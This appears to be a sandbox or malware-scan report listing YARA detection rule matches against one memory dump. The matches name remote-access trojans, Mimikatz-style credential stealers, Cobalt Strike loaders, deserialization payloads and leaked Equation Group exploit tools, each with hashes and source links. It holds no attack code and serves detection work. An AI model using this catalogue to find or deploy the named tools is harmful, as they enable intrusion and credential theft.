Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload_Spring1 date = 2017-02-04, hash5 = 95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1, hash4 = 5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c, hash3 = 8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8, hash2 = 9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a, hash1 = bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703, author = Florian Roth, description = Ysoserial Payloads - file Spring1.bin, hash7 = adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7, hash6 = 1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload date = 2017-02-04, hash5 = 747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4, hash4 = 5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c, hash3 = 1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187, hash2 = adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7, author = Florian Roth, description = Ysoserial Payloads, hash10 = 0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8, hash11 = 8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8, hash12 = bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703, hash9 = 1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99, hash8 = 95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1, hash7 = 5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56, hash6 = f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e, super_rule = 9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload_3 date = 2017-02-04, hash2 = 5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56, author = Florian Roth, description = Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CACTUSTORCH date = 2017-07-31, hash3 = a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7, hash2 = 0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea, hash1 = 314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c, author = Florian Roth, description = Detects CactusTorch Hacktool, reference = https://github.com/mdsecactivebreach/CACTUSTORCH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_2 date = 2017-04-03, hash1 = c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_3 date = 2017-04-03, hash1 = c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_5 date = 2017-04-03, hash1 = beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_WmiDLL_inMemory date = 2017-04-07, author = Florian Roth, description = Malware related to Operation Cloud Hopper - Page 25, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_WMIExec_Tool_Apr17_1 date = 2017-04-07, hash1 = 21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11, author = Florian Roth, description = Tools related to Operation Cloud Hopper, reference = https://github.com/maaaaz/impacket-examples-windows, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, modified = 2020-07-27
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimipenguin_SH date = 2017-04-01, author = Florian Roth, description = Detects Mimipenguin Password Extractor - Linux, reference = https://github.com/huntergregal/mimipenguin, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: POSHSPY_Malware date = 2017-07-15, author = Florian Roth, description = Detects, reference = https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FIN7_Backdoor_Aug17 date = 2017-08-04, author = Florian Roth, description = Detects Word Dropper from Proofpoint FIN7 Report, reference = https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_SMBExec date = 2017-06-14, hash1 = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd, author = Florian Roth, description = Detects Invoke-WmiExec or Invoke-SmbExec, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_WMIExec_Gen_1 date = 2017-06-14, hash2 = 7565d376665e3cd07d859a5cf37c2332a14c08eb808cc5d187a7f0533dc69e07, hash1 = 140c23514dbf8043b4f293c501c2f9046efcc1c08630621f651cfedb6eed8b97, author = Florian Roth, description = Detects Invoke-WmiExec or Invoke-SmbExec, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_SMBExec_Invoke_WMIExec_1 date = 2017-06-14, hash2 = b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7, author = Florian Roth, description = Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_WMIExec_Gen date = 2017-06-14, hash3 = b41bd54bbf119d153e0878696cd5a944cbd4316c781dd8e390507b2ec2d949e7, hash2 = 674fc045dc198874f323ebdfb9e9ff2f591076fa6fac8d1048b5b8d9527c64cd, author = Florian Roth, description = Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1, reference = https://github.com/Kevin-Robertson/Invoke-TheHash, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 56c6012c36aa863663fe5536d8b7fe4c460565d456ce2277a883f10d78893c01
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WMImplant date = 2017-03-24, hash1 = 860d7c237c2395b4f51b8c9bd0ee6cab06af38fff60ce3563d160d50c11d2f78, author = Florian Roth, description = Auto-generated rule - file WMImplant.ps1, reference = https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBrokers_Jan17_Screen_Strings date = 2017-01-08, author = Florian Roth, description = Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits, reference = https://bit.no.com:43110/theshadowbrokers.bit/post/message7/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Invoke_OSiRis date = 2017-03-27, hash1 = 19e4a8b07f85c3d4c396d0c4e839495c9fba9405c06a631d57af588032d2416e, author = Florian Roth, description = Osiris Device Guard Bypass - file Invoke-OSiRis.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_KHRAT_script date = 2017-08-31, hash1 = 8c88b4177b59f4cac820b0019bcc7f6d3d50ce4badb689759ab0966780ae32e3, author = Florian Roth, description = Rule derived from KHRAT script but can match on other malicious scripts as well, reference = https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_powershell date = 2017-07-23, hash1 = e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787, author = Florian Roth, description = Detects powershell script used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_Windows_UM_Task date = 2017-07-23, hash1 = 4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3, author = Florian Roth, description = Detects a Windows scheduled task as used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Impacket_Tools_Generic_1 date = 2017-04-07, hash5 = e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742, hash4 = ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6, hash3 = 2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1, hash2 = d256d1e05695d62a86d9e76830fcbb856ba7bd578165a561edd43b9f7fdb18a3, hash20 = 202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094, description = Compiled Impacket Tools, hash9 = 21d85b36197db47b94b0f4995d07b040a0455ebbe6d413bc33d926ee4e0315d9, hash8 = 0f7f0d8afb230c31fe6cf349c4012b430fc3d6722289938f7e33ea15b2996e1b, hash7 = dc85a3944fcb8cc0991be100859c4e1bf84062f7428c4dc27c71e08d88383c98, hash6 = 27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364, reference = https://github.com/maaaaz/impacket-examples-windows, super_rule = 4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3, author = Florian Roth, hash10 = 4c2921702d18e0874b57638433474e54719ee6dfa39d323839d216952c5c834a, hash11 = 47afa5fd954190df825924c55112e65fd8ed0f7e1d6fd403ede5209623534d7d, hash12 = 7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2, hash17 = e300339058a885475f5952fb4e9faaa09bb6eac26757443017b281c46b03108b, hash18 = 19544863758341fe7276c59d85f4aa17094045621ca9c98f8a9e7307c290bad4, license = https://creativecommons.org/licenses/by-nc/4.0/, hash19 = 2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086, hash13 = 9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f, hash14 = d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7, hash15 = 8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699, hash16 = efff15e1815fb3c156678417d6037ddf4b711a3122c9b5bc2ca8dc97165d3769
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Auditcleaner date = 2017-04-08, hash1 = 8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_elgingamble date = 2017-04-08, hash1 = 0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file elgingamble, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_cmsd date = 2017-04-08, hash1 = 634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file cmsd, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_ebbshave date = 2017-04-08, hash1 = eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_eggbasket date = 2017-04-08, hash1 = b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file eggbasket, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_sambal date = 2017-04-08, hash1 = 2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file sambal, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_envisioncollision date = 2017-04-08, hash1 = 75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file envisioncollision, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_cmsex date = 2017-04-08, hash1 = 2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file cmsex, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_DUL date = 2017-04-08, hash1 = 24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file DUL, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_slugger2 date = 2017-04-08, hash1 = a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file slugger2, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_jackpop date = 2017-04-08, hash1 = 0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file jackpop, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_epoxyresin_v1_0_0 date = 2017-04-08, hash1 = eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_estesfox date = 2017-04-08, hash1 = 33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file estesfox, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_elatedmonkey_1_0_1_1 date = 2017-04-08, hash1 = bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ftshell_ftshell_v3_10_3_0 date = 2017-04-08, hash2 = 0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__scanner_scanner_v2_1_2 date = 2017-04-08, hash2 = 9807aaa7208ed6c5da91c7c30ca13d58d16336ebf9753a5cea513bcb59de2cff, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files scanner, scanner.v2.1.2, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ghost_sparc_ghost_x86_3 date = 2017-04-08, hash2 = 82c899d1f05b50a85646a782cddb774d194ef85b74e1be642a8be2c7119f4e33, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ghost_sparc, ghost_x86, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = d5ff0208d9532fc0c6716bd57297397c8151a01bf4f21311f24e7a72551f9bf1
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__jparsescan_parsescan_5 date = 2017-04-08, hash2 = 942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__funnelout_v4_1_0_1 date = 2017-04-08, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files funnelout.v4.1.0.1.pl, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 457ed14e806fdbda91c4237c8dc058c55e5678f1eecdd78572eff6ca0ed86d33
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__magicjack_v1_1_0_0_client date = 2017-04-08, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files magicjack_v1.1.0.0_client-1.1.0.0.py, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup__ftshell date = 2017-04-08, hash4 = 0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951, author = Florian Roth, description = Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_noclient_3_3_2 date = 2017-04-09, hash1 = 3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72, author = Florian Roth, description = Equation Group hack tool set, reference = https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_Eternalromance date = 2017-04-15, hash2 = b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d
Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EquationGroup_Toolset_Apr17_Gen2 date = 2017-04-15, hash4 = 8f7e10a8eedea37ee3222c447410fd5b949bd352d72ef22ef0b2821d9df2f5ba, hash3 = f2e90e04ddd05fa5f9b2fec024cd07365aebc098593d636038ebc2720700662b, hash2 = 561c0d4fc6e0ff0a78613d238c96aed4226fbb7bb9ceea1d19bc770207a6be1e, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 7fe425cd040608132d4f4ab2671e04b340a102a20c97ffdcf1b75be43a9369b5
